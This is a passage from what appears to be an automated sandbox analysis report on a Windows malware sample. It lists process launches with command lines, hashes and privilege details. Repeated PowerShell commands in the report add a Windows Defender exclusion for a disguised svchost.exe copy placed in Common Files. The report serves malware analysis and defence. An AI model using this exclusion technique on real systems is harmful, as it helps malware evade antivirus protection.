Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:30
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
Imagebase: 0x1180000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 12:50:31
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:33
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:34
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:34
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout 1
Imagebase: 0x13b0000
File size: 26112 bytes
MD5 hash: 121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:42
Start date: 08/04/2021
Path: C:\Users\user\Desktop\qINcOlwRud.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\qINcOlwRud.exe
Imagebase: 0x750000
File size: 46592 bytes
MD5 hash: D6B29ADD344D2284845F133B8505126E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

General

Start time: 12:50:44
Start date: 08/04/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7488e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:50:45
Start date: 08/04/2021
Path: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe'
Imagebase: 0x910000
File size: 46592 bytes
MD5 hash: D6B29ADD344D2284845F133B8505126E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 27%, ReversingLabs

General

Start time: 12:50:45
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1936
Imagebase: 0xd80000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 12:50:53
Start date: 08/04/2021
Path: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe'
Imagebase: 0x3b0000
File size: 46592 bytes
MD5 hash: D6B29ADD344D2284845F133B8505126E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 12:50:56
Start date: 08/04/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase: 0x7ff7488e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                General

                                                                                Start time:12:50:56
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:50:57
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:50:58
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:50:59
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:00
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:10
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Start time:12:51:10
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:10
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Start time:12:51:11
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:11
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Start time:12:51:13
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:20
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                Imagebase:0x840000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:21
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:22
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:timeout 1
                                                                                Imagebase:0xed0000
                                                                                File size:26112 bytes
                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Start time:12:51:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Start time:12:51:35
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:35
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Start time:12:51:37
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:12:51:41
                                                                                Start date:08/04/2021
                                                                                Path:C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                                Imagebase:0xa10000
                                                                                File size:46592 bytes
                                                                                MD5 hash:D6B29ADD344D2284845F133B8505126E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Disassembly

                                                                                Code Analysis
